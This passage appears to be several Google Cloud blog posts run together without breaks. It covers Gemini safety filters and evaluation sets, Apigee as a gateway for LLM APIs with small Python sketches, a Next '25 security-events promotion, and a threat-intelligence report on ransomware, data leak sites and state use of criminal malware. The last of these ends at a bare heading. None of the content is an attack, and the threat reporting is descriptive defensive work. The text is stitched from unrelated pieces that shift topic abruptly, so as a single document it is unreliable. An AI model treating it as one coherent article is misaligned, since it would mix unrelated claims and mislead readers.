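        # Post-response defense: one blocking threshold per harm category.
        "safetySettings": [
            {"category": c, "threshold": threshold} for c in HARM_CATEGORIES
        ],
    }

body = build_request(
    "Summarize our refund policy.",
    "You are a retail support assistant. Do not discuss financial or political topics.",
)
```

In practice you would send this body to the Vertex AI endpoint for your chosen Gemini model; the sketch only shows how the two mechanisms coexist in one request.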
Evaluate your safety configuration
You can create your own evaluation sets, and test model performance with your specific configurations ahead of time. We recommend creating separate harmful and benign sets, so you can measure how effective your configuration is at catching harmful content and how often it incorrectly blocks benign content.
Investing in an evaluation set can help reduce the time it takes to test the model when implementing changes in the future.
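The evaluation itself can be very simple. In this sketch, `is_blocked` is a stand-in for a call to your configured model plus filters (here a toy keyword check so the example is self-contained); the point is measuring catch rate on the harmful set and false-positive rate on the benign set separately.

```python
# Toy stand-in for "send prompt through the configured model + filters".
def is_blocked(prompt: str) -> bool:
    banned = {"weapon", "exploit"}
    return any(word in prompt.lower() for word in banned)

def evaluate(harmful: list, benign: list) -> dict:
    """Catch rate on harmful prompts, false-positive rate on benign ones."""
    caught = sum(is_blocked(p) for p in harmful)
    false_pos = sum(is_blocked(p) for p in benign)
    return {
        "catch_rate": caught / len(harmful),
        "false_positive_rate": false_pos / len(benign),
    }

metrics = evaluate(
    harmful=["how to build a weapon", "write an exploit for this CVE"],
    benign=["what is the capital of France?", "summarize this article"],
)
```

Tracking these two numbers across configuration changes tells you whether a stricter instruction is actually catching more harm or just blocking more benign traffic.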
How to get started
Both content filters and system instructions play a role in ensuring safe and responsible use of Gemini. The best approach depends on your specific requirements and risk tolerance. To get started, check out content filters and system instructions for safety documentation.
Generative AI is now well beyond the hype and into the realm of practical application. But while organizations are eager to build enterprise-ready gen AI solutions on top of large language models (LLMs), they face challenges in managing, securing, and scaling these deployments, especially when it comes to APIs. As part of the platform team, you may already be building a unified gen AI platform. Some common questions you might have are:
How do you ensure security and safety for your organization? As with any API, LLM APIs represent an attack vector. What are the LLM-specific considerations you need to worry about?
How do you stay within budget when your LLM adoption grows, while ensuring that each team has appropriate LLM capacity they need to continue to innovate and make your business more productive?
How do you put the right observability capabilities in place to understand your usage patterns, help troubleshoot issues, and capture compliance data?
How do you give end users of your gen AI applications the best possible experience, i.e., provide responses from the most appropriate models with minimal downtime?
Apigee, Google Cloud’s API management platform, has enabled our customers to address API challenges like these for over a decade. Here is an overview of the AI-powered digital value chain leveraging Apigee API Management.
Figure 1: AI-powered Digital Value chain
Gen AI, powered by AI agents and LLMs, is changing how customers interact with businesses, creating a large opportunity for any business. Apigee streamlines the integration of gen AI agents into applications by bolstering their security, scalability, and governance through features like authentication, traffic control, analytics, and policy enforcement. It also manages interactions with LLMs, improving security and efficiency. Additionally, Application Integration, an Integration-Platform-as-a-Service solution from Google Cloud, offers pre-built connectors that allow gen AI agents to easily connect with databases and external systems, helping them fulfill user requests.
This blog details how Apigee’s customers have been using the product to address challenges specific to LLM APIs. We’re also releasing a comprehensive set of reference solutions that enable you to get started on addressing these challenges yourself with Apigee. You can also view a webinar on the same topic, complete with product demos.
Apigee as a proxy for agents
AI agents leverage capabilities from LLMs to accomplish tasks for end-users. These agents can be built using a variety of tools — from no-code and low-code platforms, to full-code frameworks like LangChain or LlamaIndex. Apigee acts as an intermediary between your AI application and its agents. It enhances security by allowing you to defend your LLM APIs against the OWASP Top 10 API Security risks, manages user authentication and authorization, and optimizes performance through features like semantic caching. Additionally, Apigee enforces token limits to control costs and can even orchestrate complex interactions between multiple AI agents for advanced use cases.
Apigee as a gateway between LLM application and models
Depending on the task at hand, your AI agents might need to tap into the power of different LLMs. Apigee simplifies this by intelligently routing and managing failover of requests to the most suitable LLM using Apigee’s flexible configurations and templates. It also streamlines the onboarding of new AI applications and agents while providing robust access control for your LLMs. Beyond LLMs, agents often need to connect with databases and external systems to fully address users’ needs. Apigee’s robust API Management platform enables these interactions via managed APIs, and for more complex integrations, where custom business logic is required, you can leverage Google Cloud’s Application Integration platform.
It’s important to remember that these patterns aren’t one-size-fits-all. Your specific use cases will influence the architecture pattern for an agent and LLM interaction. For example, you might not always need to route requests to multiple LLMs. In some scenarios, you could connect directly to databases and external systems from the Apigee agent proxy layer. The key is flexibility — Apigee lets you adapt the architecture to match your exact needs.
Now let’s break down, one by one, the specific areas where Apigee helps:
AI safety: For any API managed with Apigee, you can call out to Model Armor, Google Cloud’s model safety offering that allows you to inspect every prompt and response to protect you against potential prompt attacks and help your LLMs respond within the guardrails you set. For example, you can specify that your LLM application does not provide answers about financial or political topics.
Latency and cost: Model response latency continues to be a major factor when building LLM-powered applications, and this will only get worse as more reasoning happens during inference. With Apigee, you can implement a semantic cache that allows you to cache responses to any model for semantically similar questions. This dramatically reduces the time end users need to wait for a response.
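The idea behind a semantic cache can be sketched in a few lines. This is a conceptual illustration only: a production setup would use a real embedding model and vector store, whereas the toy bag-of-words vectors and the 0.8 similarity threshold below are assumptions chosen to keep the example self-contained.

```python
# Conceptual sketch of a semantic cache: return a cached response when a new
# prompt is "close enough" to one already answered.
import math
from collections import Counter

def embed(text: str) -> Counter:
    # Toy embedding: bag-of-words term counts (a real system uses a model).
    return Counter(text.lower().split())

def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[t] * b.get(t, 0) for t in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

class SemanticCache:
    def __init__(self, threshold: float = 0.8):
        self.entries = []          # list of (embedding, cached_response)
        self.threshold = threshold

    def get(self, prompt: str):
        vec = embed(prompt)
        for cached_vec, response in self.entries:
            if cosine(vec, cached_vec) >= self.threshold:
                return response    # cache hit: skip the model call entirely
        return None

    def put(self, prompt: str, response: str):
        self.entries.append((embed(prompt), response))

cache = SemanticCache()
cache.put("what are your store opening hours", "We open 9am-6pm.")
hit = cache.get("what are your store opening hours today")   # similar wording
miss = cache.get("reset my password")                        # unrelated prompt
```

A hit avoids the model call entirely, which is where both the latency and the cost savings come from.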
Performance: Different models are good at different things. For example, Gemini Pro models provide the highest quality answers, while Gemini Flash models excel at speed and efficiency. You can route users’ prompts to the best model for the job, depending on the use case or application.
You can decide which model to use by specifying it in your API call and Apigee routes it to your desired model while keeping a consistent API contract. See this reference solution to get started.
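A routing layer like this boils down to a small lookup that preserves the request shape. The sketch below is illustrative: the task names, model aliases, and default are placeholder assumptions, and in Apigee this mapping would live in proxy configuration rather than application code.

```python
# Sketch of task-based model routing behind one stable API contract.
# Task names and model aliases here are illustrative placeholders.
ROUTES = {
    "summarize": "gemini-flash",  # latency-sensitive, high-volume tasks
    "analyze": "gemini-pro",      # quality-sensitive reasoning tasks
}
DEFAULT_MODEL = "gemini-flash"

def route(request: dict) -> dict:
    """Pick a backend model from the caller's task, keeping the same request shape."""
    model = ROUTES.get(request.get("task"), DEFAULT_MODEL)
    return {**request, "model": model}

routed = route({"task": "analyze", "prompt": "Compare these two contracts."})
```

Because the caller's request shape never changes, backends can be swapped or re-weighted without touching any client application.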
Distribution and usage limits: With Apigee you can create a unified portal with self-service access to all the models in your organization. You can also set up usage limits by individual apps and developers to maintain capacity for those who need it, while also controlling overall costs. See how you can set up usage limits in Apigee using LLM token counts here.
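The core of a token-based quota is a per-app counter over a time window. This sketch only illustrates the mechanics; the limit, window length, and app identifiers are example values, and Apigee's quota policy handles this declaratively rather than in application code.

```python
# Sketch of per-app token quotas over a fixed time window, keyed on the
# LLM token counts of each request. Limit and window are example values.
import time

class TokenQuota:
    def __init__(self, limit_per_window: int, window_seconds: float = 60.0):
        self.limit = limit_per_window
        self.window = window_seconds
        self.usage = {}  # app_id -> (window_start, tokens_used)

    def allow(self, app_id: str, tokens: int, now=None) -> bool:
        now = time.monotonic() if now is None else now
        start, used = self.usage.get(app_id, (now, 0))
        if now - start >= self.window:  # window expired: reset the counter
            start, used = now, 0
        if used + tokens > self.limit:
            return False                # throttle: request would exceed quota
        self.usage[app_id] = (start, used + tokens)
        return True

quota = TokenQuota(limit_per_window=1000)
ok = quota.allow("team-a", 600, now=0.0)            # within quota
blocked = not quota.allow("team-a", 600, now=1.0)   # would exceed 1000 tokens
other = quota.allow("team-b", 600, now=1.0)         # separate app, own quota
```

Counting tokens rather than requests is what keeps one chatty application from silently consuming another team's capacity.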
Availability: Due to the high computational demands of LLM inference, model providers regularly restrict the number of tokens you can use in a certain time window. If you reach a model limit, requests from your applications will get throttled, which could lead to your end users being locked out of the model. In order to prevent this, you can implement a circuit breaker in Apigee so that requests are re-routed to a model with available capacity. See this reference solution to get started.
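The failover behavior can be sketched as an ordered list of backends tried until one succeeds. This is a simplified illustration under assumed names: the `ModelExhausted` error, the backend functions, and their responses are all hypothetical stand-ins for real provider throttling signals such as HTTP 429.

```python
# Sketch of re-routing requests when a model's capacity is exhausted,
# in the spirit of a circuit breaker. All names here are illustrative.

class ModelExhausted(Exception):
    """Stand-in for a provider throttling response (e.g., HTTP 429)."""

def call_with_failover(prompt: str, backends: list) -> str:
    """Try each backend in order; fail over on throttling instead of failing the user."""
    last_error = None
    for backend in backends:
        try:
            return backend(prompt)
        except ModelExhausted as e:
            last_error = e  # this backend is out of capacity; try the next one
    raise last_error        # every backend was exhausted

def primary(prompt):
    raise ModelExhausted("primary model out of tokens")

def secondary(prompt):
    return f"answer from secondary: {prompt}"

result = call_with_failover("hello", [primary, secondary])
```

A fuller circuit breaker would also remember that the primary tripped and skip it for a cooldown period, rather than probing it on every request.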
Reporting: As a platform team, you need visibility into usage of the various models you support, as well as which apps are consuming how many tokens. You might want to use this data for internal cost reporting or to optimize usage. Whatever your motivation, with Apigee you can build dashboards that let you see usage based on actual token counts, the currency of LLM APIs. This way you can see the true usage volume across your applications. See this reference solution to get started.
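The aggregation behind such a dashboard is a roll-up of per-request token counts by application. The log record shape below is an assumed example, not Apigee's actual analytics schema.

```python
# Sketch of rolling up per-request token counts by app for a usage dashboard.
# The record fields are an assumed example schema.
from collections import defaultdict

def usage_by_app(records: list) -> dict:
    totals = defaultdict(int)
    for r in records:
        # prompt + response tokens together reflect the true cost of a call
        totals[r["app"]] += r["prompt_tokens"] + r["response_tokens"]
    return dict(totals)

report = usage_by_app([
    {"app": "support-bot", "prompt_tokens": 120, "response_tokens": 300},
    {"app": "support-bot", "prompt_tokens": 80, "response_tokens": 150},
    {"app": "search", "prompt_tokens": 40, "response_tokens": 60},
])
```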
Auditing and troubleshooting: Perhaps you need to log all interactions with LLMs (prompts, responses, RAG data) to meet compliance or troubleshooting requirements. Or perhaps you want to analyze response quality to continue to improve your LLM applications. With Apigee you can safely log any LLM interaction with Cloud Logging, de-identify it, and inspect it from a familiar interface. Get started here.
Security: With APIs increasingly seen as an attack surface, security is paramount to any API program. Apigee can act as a secure gateway for LLM APIs, allowing you to control access with API keys, OAuth 2.0, and JWT validation. This helps you enforce using enterprise security standards to authenticate users and applications that interact with your models. Apigee can also help prevent abuse and overload by enforcing rate limits and quotas, safeguarding LLMs from malicious attacks and unexpected traffic spikes.
In addition to these security controls, you can also use Apigee to control the model providers and models that can be used. You can do this by creating policies that define the models that can be accessed by which users or applications. For example, you could create a policy that only allows certain users to access your most powerful LLMs, or you could create a policy that only allows certain applications to access your LLMs for specific tasks. This gives you granular control over how your LLMs are used, so they are only used for their intended purposes.
By integrating Apigee with your LLM architecture, you create a secure and reliable environment for your AI applications to thrive.
Ready to unlock the full potential of gen AI?
Explore Apigee’s comprehensive capabilities for operationalizing AI and start building secure, scalable, and efficient gen AI solutions today! Visit our Apigee generative AI samples page to learn more and get started, watch a webinar with more details, or contact us here!
Google Cloud Next 2025 is coming up fast, and it’s shaping up to be a must-attend event for the cybersecurity community and anyone passionate about learning more about the threat landscape. We’re going to offer an immersive experience packed with opportunities to connect with experts, explore innovative technologies, and hone your skills in the ever-evolving world of cloud security and governance, frontline threat intelligence, enterprise compliance and resilience, AI risk management, and incident response.
Whether you’re a seasoned security pro or just starting your security journey, Next ’25 has something for you.
Immerse yourself in the Security Hub
The heart of our security presence at Next ‘25 will be the Security Hub, a dynamic space designed for engagement and exploration. Here, you can dive deep into the full portfolio of Google Cloud Security products, experience expanded demos, and get your most pressing questions answered by the engineers who build them.
Experience the SOC Arena
Step into our Security Operations Center (SOC) Arena for a front-row seat to real-world attack scenarios. Witness the latest hacker tactics and learn how Google Cloud equips cybersecurity teams with the data, AI, and scalable analytics needed to quickly detect and remediate attacks. Between SOC sessions, security experts and key partners will deliver lightning talks, sharing foundational insights and valuable resources to bolster your security knowledge.
Sharpen your skills in the Security Situation Room
The Situation Room offers two unique avenues for boosting your security expertise:
Security Tabletop Workshop: Prepare your organization for challenging security incidents by participating in a realistic cybersecurity tabletop exercise. Role-play different personas in simulated incidents such as a data breach or ransomware attack, and explore potential responses to gain insight into how your team might react, learn from varied perspectives, and refine your approach through collaborative exploration. This exercise can help you identify vulnerabilities, evaluate incident response strategies, address gaps, foster collaboration, clarify roles, and ultimately reduce the potential impact of future attacks.
Birds of a Feather Sessions: These no-slide, discussion-focused sessions offer invaluable opportunities to connect with peers and Google Cloud Security experts. Dive into topics including securing AI, identity and access management, network security, and protection against fraud and abuse. Share challenges, discuss best practices, and explore cutting-edge trends in a collaborative environment as you network, learn, and contribute to the vibrant Google Cloud Security community.
Get hands-on in the Security Sandbox
The Security Sandbox is where the action happens. Two interactive experiences await:
Capture the Flag (CTF): Test your cybersecurity prowess in Google Threat Intelligence’s CTF challenge. This unique game blends real-world data from CISA advisories, ransom notes, and Dark Web intelligence into a simulated threat hunt.
Use industry-standard tools and data to navigate clues, analyze evidence, and solve puzzles. This CTF is designed for all skill levels, offering a chance to learn valuable techniques, experience the thrill of an investigation, and even win prizes.
ThreatSpace: Step into Google Cloud’s ThreatSpace, a digital training ground where you can experience real cyberattacks and practice your incident response skills in a safe environment. Mandiant’s red team will simulate attacks while their incident response team guides you through the investigation. Use Google Cloud Security tools including Security Operations and Threat Intelligence to uncover the attacker’s methods and prevent further damage.
Connect and recharge at Coffee Talk
Grab a coffee, snag a copy of “The Defender’s Advantage,” and chat with Google Cloud Security experts. Learn how our products and services can empower your security strategy across the domains of intelligence, detection, response, validation, hunting, and mission control, and get personalized advice for your organization.
Register today
Next ’25 is your chance to immerse yourself in the world of cybersecurity, connect with industry leaders, and gain the knowledge and skills you need to stay ahead of the curve. To join us, register here.
Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders’ resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions.
A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare’s share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks means that they must be taken seriously as a national security threat, no matter the motivation of the actors behind them.
Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel cyber support for its war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine, while CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims’ crypto wallets.
Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts.
Stand-Alone Cybercrime is a Threat to Countries’ National Security
Financially motivated cyber intrusions, even those without any ties to state goals, harm national security. A single incident can be impactful enough on its own to have a severe consequence on the victim and disrupt citizens’ access to critical goods and services. The enormous volume of financially motivated intrusions occurring every day also has a cumulative impact, hurting national economic competitiveness and placing huge strain on cyber defenders, leading to decreased readiness and burnout.
A Single Financially-Motivated Operation Can Have Severe Effects
Cybercrime, particularly ransomware, is a serious threat to critical infrastructure. Disruptions to energy infrastructure, such as the 2021 Colonial Pipeline attack, a 2022 incident at the Amsterdam-Rotterdam-Antwerp refining hub, and the 2023 attack on Petro-Canada, have disrupted citizens’ ability to access vital goods. While the impacts in these cases were temporary and recoverable, a ransomware attack during a weather emergency or other acute situation could have devastating consequences.
Beyond energy, ransomware attacks on the healthcare sector have had the most severe consequences on everyday people. At the height of the pandemic in early 2020, it appeared that ransomware groups might steer clear of hospitals, with multiple groups making statements to that effect, but the forbearance did not hold. Healthcare organizations’ critical missions and the high impact of disruptions have led them to be perceived as more likely to pay a ransom and led some groups to increase their focus on targeting healthcare. The healthcare industry, especially hospitals, almost certainly continues to be a lucrative target for ransomware operators given the sensitivity of patient data and the criticality of the services it provides.
Since 2022, Google Threat Intelligence Group (GTIG) has observed a notable increase in the number of data leak site (DLS) victims from within the hospital subsector. Data leak sites, which are used to release victim data following data theft extortion incidents, are intended to pressure victims to pay a ransom demand or give threat actors additional leverage during ransom negotiations.
In July 2024, the Qilin (aka “AGENDA”) DLS announced upcoming attacks targeting US healthcare organizations. They followed through with this threat by adding a regional medical center to their list of claimed victims on the DLS the following week, and adding multiple healthcare and dental clinics in August 2024. The ransomware operators have purportedly stated that they focus their targeting on sectors that pay well, and one of those sectors is healthcare.
In March 2024, the RAMP forum actor “badbone,” who has been associated with INC ransomware, sought illicit access to Dutch and French medical, government, and educational organizations, stating that they were willing to pay 2–5% more for hospitals, particularly ones with emergency services.
Studies from academics and internal hospital reviews have shown that the disruptions from ransomware attacks go beyond inconvenience and have led to life-threatening consequences for patients. Disruptions can impact not just individual hospitals but also the broader healthcare supply chain. Cyberattacks on companies that manufacture critical medications and life-saving therapies can have far-reaching consequences worldwide.
A recent study from researchers at the University of Minnesota – Twin Cities School of Public Health showed that among patients already admitted to a hospital when a ransomware attack takes place, “in-hospital mortality increases by 35–41%.”
Public reporting stated that UK National Health Service data showed a June 2024 ransomware incident at a contractor led to multiple cases of “long-term or permanent impact on physical, mental or social function or shortening of life-expectancy,” with more numerous cases of less severe effects.
Ransomware operators are aware that their attacks on hospitals will have severe consequences and will likely increase government attention on them. Although some have devised strategies to mitigate the blowback from these operations, the potential monetary rewards associated with targeting hospitals continue to drive attacks on the healthcare sector.
The actor “FireWalker,” who has recruited partners for REDBIKE (aka Akira) ransomware operations, indicated a willingness to accept access to government and medical targets, but in those cases a different ransomware called “FOULFOG” would be used.
Leaked private communications broadly referred to as the “ContiLeaks” reveal that the actors expected their plan to target the US healthcare system in the fall of 2020 to cause alarm, with one actor stating “there will be panic.”
Economic Disruption
On May 8, 2022, Costa Rican President Rodrigo Chaves declared a national emergency caused by CONTI ransomware attacks against several Costa Rican government agencies the month prior. These intrusions caused widespread disruptions in government medical, tax, pension, and customs systems. With imports and exports halted, ports were overwhelmed, and the country reportedly experienced millions of dollars of losses. The remediation costs extended beyond Costa Rica; Spain supported the immediate response efforts, and in 2023, the US announced $25 million USD in cybersecurity aid to Costa Rica.
While the Costa Rica incident was exceptional, responding to a cybercrime incident can involve significant expenses for the affected entity, such as paying multi-million dollar ransom demands, loss of income due to system downtime, providing credit monitoring services to impacted clients, and paying remediation costs and fines. In just one example, a US healthcare organization reported $872 million USD in “unfavorable cyberattack effects” after a disruptive incident. In the most extreme cases, these costs can contribute to organizations ceasing operations or declaring bankruptcy.
In addition to the direct impacts to individual organizations, financial impacts often extend to taxpayers and can have significant impacts on the national economy due to follow-on effects of the disruptions. The US Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3) has indicated that between October 2013 and December 2023, business email compromise (BEC) operations alone led to $55 billion USD in losses. The cumulative effect of these cybercrime incidents can have an impact on a country’s economic competitiveness. This can be particularly severe for smaller or developing countries, especially those with a less diverse economy.
Data Leak Sites Add Additional Threats
In addition to deploying ransomware to interfere with business operations, criminal groups have added the threat of leaking data stolen from victims to bolster their extortion operations. This now standard tactic has increased the volume of sensitive data being posted by criminals and created an opportunity for it to be obtained and exploited by state intelligence agencies.
Threat actors post proprietary company data—including research and product designs—on data leak sites where they are accessible to the victims’ competitors. GTIG has previously observed threat actors sharing tips for targeting valuable data for extortion operations. In our research, GTIG identified Conti “case instructions” indicating that actors should prioritize certain types of data to use as leverage in negotiations, including files containing confidential information, document scans, HR documents, company projects, and information protected by the General Data Protection Regulation (GDPR).
The number of data leak sites has proliferated, with the number of sites tracked by GTIG almost doubling since 2022. Leaks of confidential business and personal information by extortion groups can cause embarrassment and legal consequences for the affected organization, but they also pose national security threats. If a company’s confidential intellectual property is leaked, it can undermine the firm’s competitive position in the market and undermine the host country’s economic competitiveness. The wide-scale leaking of personally identifiable information (PII) also creates an opportunity for foreign governments to collect this information to facilitate surveillance and tracking of a country’s citizens.
Cybercrime Directly Supporting State Activity
Since the earliest computer network intrusions, financially motivated actors have conducted operations for the benefit of hostile governments. While this pattern has been consistent, the surge in cyber activity following Russia’s full-scale invasion of Ukraine has shown that, in times of heightened need, the latent talent pool of cybercriminals can be paid or coerced to support state goals. Operations carried out in support of the state, but by criminal actors, have numerous benefits for their sponsors, including a lower cost and increased deniability. As the volume of financially motivated activity increases, the potential danger it presents does as well.
States as a Customer in Cybercrime Ecosystems
Modern cybercriminals are likely to specialize in a particular area of cybercrime and partner with other entities with diverse specializations to conduct operations. The specialization of cybercrime capabilities presents an opportunity for state-backed groups to simply show up as another customer for a group that normally sells to other criminals. Purchasing malware, credentials, or other key resources from illicit forums can be cheaper for state-backed groups than developing them in-house, while also providing some ability to blend into financially motivated operations and attract less notice.
Russian State Increasingly Leveraging Malware, Tooling Sourced from Crime Marketplaces
Google assesses that resource constraints and operational demands have contributed to Russian cyber espionage groups’ increasing use of free or publicly available malware and tooling, including those commonly employed by criminal actors to conduct their operations. Following Russia’s full-scale invasion of Ukraine, GTIG has observed groups suspected to be affiliated with Russian military intelligence services adopt this type of “low-equity” approach to managing their arsenal of malware, utilities, and infrastructure. The tools procured from financially motivated actors are more widespread and lower cost than those developed by the government. This means that if an operation using this malware is discovered, the cost of developing a new tool will not be borne by the intelligence agency; additionally, the use of such tools may assist in complicating attribution efforts. Notably, multiple threat clusters with links to Russian military intelligence have leveraged disruptive malware adapted from existing ransomware variants to target Ukrainian entities.
APT44 (Sandworm, FROZENBARENTS)
APT44, a threat group sponsored by Russian military intelligence, almost certainly relies on a diverse set of Russian companies and criminal marketplaces to source and sustain its more frequently operated offensive capabilities. The group has used criminally sourced tools and infrastructure as a source of disposable capabilities that can be operationalized on short notice without immediate links to its past operations. Since Russia’s full-scale invasion of Ukraine, APT44 has increased its use of such tooling, including malware such as DARKCRYSTALRAT (DCRAT), WARZONE, and RADTHIEF (“Rhadamanthys Stealer”), and bulletproof hosting infrastructure such as that provided by the Russian-speaking actor “yalishanda,” who advertises in cybercriminal underground communities.
APT44 campaigns in 2022 and 2023 deployed RADTHIEF against victims in Ukraine and Poland. In one campaign, spear-phishing emails targeted a Ukrainian drone manufacturer and leveraged SMOKELOADER, a publicly available downloader popularized in a Russian-language underground forum that is still frequently used in criminal operations, to load RADTHIEF.
APT44 also has a history of deploying disruptive malware built upon known ransomware variants. In October 2022, a cluster we assessed with moderate confidence to be APT44 deployed PRESSTEA (aka Prestige) ransomware against logistics entities in Poland and Ukraine, a rare instance in which APT44 deployed disruptive capabilities against a NATO country. In June 2017, the group conducted an attack leveraging ETERNALPETYA (aka NotPetya), a wiper disguised as ransomware, timed to coincide with Ukraine’s Constitution Day marking its independence from Russia. Nearly two years earlier, in late 2015, the group used a modified BLACKENERGY variant to disrupt the Ukrainian power grid. BLACKENERGY originally emerged as a distributed denial-of-service (DDoS) tool, with later versions sold in criminal marketplaces.
UNC2589 (FROZENVISTA)
UNC2589, a threat cluster whose activity has been publicly attributed to the Russian General Staff Main Intelligence Directorate (GRU)’s 161st Specialist Training Center (Unit 29155), has conducted full-spectrum cyber operations, including destructive attacks, against Ukraine. The actor is known to rely on non-military elements including cybercriminals and private-sector organizations to enable their operations, and GTIG has observed the use of a variety of malware-as-a-service tools that are prominently sold in Russian-speaking cybercrime communities.
In January 2022, a month prior to the invasion, UNC2589 deployed PAYWIPE (also known as WHISPERGATE) and SHADYLOOK wipers against Ukrainian government entities in what may have been a preliminary strike, using the GOOSECHASE downloader and FINETIDE dropper to drop and execute SHADYLOOK on the target machine. US Department of Justice indictments identified a Russian civilian, who GTIG assesses was a likely criminal contractor, as managing the digital environments used to stage the payloads used in the attacks. Additionally, CERT-UA corroborated GTIG’s findings of strong similarities between SHADYLOOK and WhiteBlackCrypt ransomware (also tracked as WARYLOOK). GOOSECHASE and FINETIDE are also publicly available for purchase on underground forums.
Turla (SUMMIT)
In September 2022, GTIG identified an operation leveraging a legacy ANDROMEDA infection to gain initial access to selective targets conducted by Turla, a cyber espionage group we assess to be sponsored by Russia’s Federal Security Service (FSB). Turla re-registered expired command-and-control (C&C or C2) domains previously used by ANDROMEDA, a common commodity malware that was widespread in the early 2010s, to profile victims; it then selectively deployed KOPILUWAK and QUIETCANARY to targets in Ukraine. The ANDROMEDA backdoor whose C2 was hijacked by Turla was first uploaded to VirusTotal in 2013 and spreads from infected USB keys.
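The domain-takeover tactic described above can be sketched from the defender’s side: given a watchlist of legacy commodity-malware C2 domains, flag any that resolve again, since a long-dead C2 name that starts resolving is a signal that someone may have re-registered it and can now receive residual beacons. This is a minimal illustrative heuristic, not GTIG tooling; the domain names and the resolver hook below are hypothetical.

```python
import socket
from typing import Callable, Iterable, List, Optional

def find_reregistered(domains: Iterable[str],
                      resolve: Callable[[str], Optional[str]]) -> List[str]:
    """Return the legacy C2 domains on the watchlist that currently resolve.

    A resolver is injected so the check can be run against live DNS or
    against recorded/passive DNS data in tests.
    """
    live = []
    for domain in domains:
        if resolve(domain) is not None:  # name resolves -> possibly re-registered
            live.append(domain)
    return live

def dns_resolve(domain: str) -> Optional[str]:
    """Live resolver: returns an IP string, or None if the name does not resolve."""
    try:
        return socket.gethostbyname(domain)
    except OSError:
        return None
```

In practice a result from `find_reregistered(watchlist, dns_resolve)` is only a starting point: registration dates and hosting history would be needed to distinguish a benign sinkhole from hostile takeover of the name.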
While GTIG has continued to observe ANDROMEDA infections across a wide variety of victims, GTIG has only observed suspected Turla payloads delivered in Ukraine. However, Turla’s tactic of piggybacking on widely distributed, financially motivated malware to enable follow-on compromises is one that can be used against a wide range of organizations. Additionally, the use of older malware and infrastructure may cause such a threat to be overlooked by defenders triaging a wide variety of alerts.
In December 2024, Microsoft reported that Secret Blizzard, an actor that aligns approximately with what we track as Turla, used Amadey bot malware associated with cybercriminal activity to target Ukrainian military entities. While we are unable to independently confirm this activity, Microsoft’s findings suggest that Turla has continued to leverage the tactic of using cybercrime malware.
APT29 (ICECAP)
In late 2021, GTIG reported on a campaign conducted by APT29, a threat group assessed to be sponsored by the Russian Foreign Intelligence Service (SVR), in which operators used credentials likely procured from an infostealer malware campaign conducted by a third-party actor to gain initial access to European entities. Infostealers are a broad classification of malware that have the capability or primary goal of collecting and stealing a range of sensitive user information such as credentials, browser data and cookies, email data, and cryptocurrency wallets. An analysis of workstations belonging to the target revealed that some systems had been infected with the CRYPTBOT infostealer shortly before a stolen session token used to gain access to the targets’ Microsoft 365 environment was generated.
An example of the sale of government credentials on an underground forum
Use of Cybercrime Tools by Iran and China
While Russia is the country that has most frequently been identified drawing on resources from criminal forums, it is not the only one. For instance, in May 2024, GTIG identified a suspected Iranian group, UNC5203, using the aforementioned RADTHIEF backdoor in an operation using themes associated with the Israeli nuclear research industry.
In multiple investigations, the Chinese espionage operator UNC2286 was observed ostensibly carrying out extortion operations, including using STEAMTRAIN ransomware, possibly to mask its activities. The ransomware dropped a JPG file named “Read Me.jpg” that largely copies the ransomware note delivered with DARKSIDE. However, no links have been established with the DARKSIDE ransomware-as-a-service (RaaS), suggesting the similarities are largely superficial and intended to lend credibility to the extortion attempt. Deliberately mixing ransomware activities with espionage intrusions supports the Chinese Government’s public efforts to confound attribution by conflating cyber espionage activity and ransomware operations.
Criminals Supporting State Goals
In addition to purchasing tools for state-backed intrusion groups to use, countries can directly hire or co-opt financially motivated attackers to conduct espionage and attack missions on behalf of the state. Russia, in particular, has leveraged cybercriminals for state operations.
Current and Former Russian Cybercriminal Actors Engage in Targeted Activity Supporting State Objectives
Russian intelligence services have increasingly leveraged pre-existing or new relationships with cybercriminal groups to advance national objectives and augment intelligence collection. They have done so in particular since the beginning of Russia’s full-scale invasion of Ukraine. GTIG judges that this reflects a combination of new efforts by the Russian state and the continuation of ongoing efforts by other financially motivated, Russia-based threat actors whose relationships with the Russian intelligence services predated the invasion. In at least some cases, current and former members of Russian cybercriminal groups have carried out intrusion activity likely in support of state objectives.
CIGAR (UNC4895, RomCom)
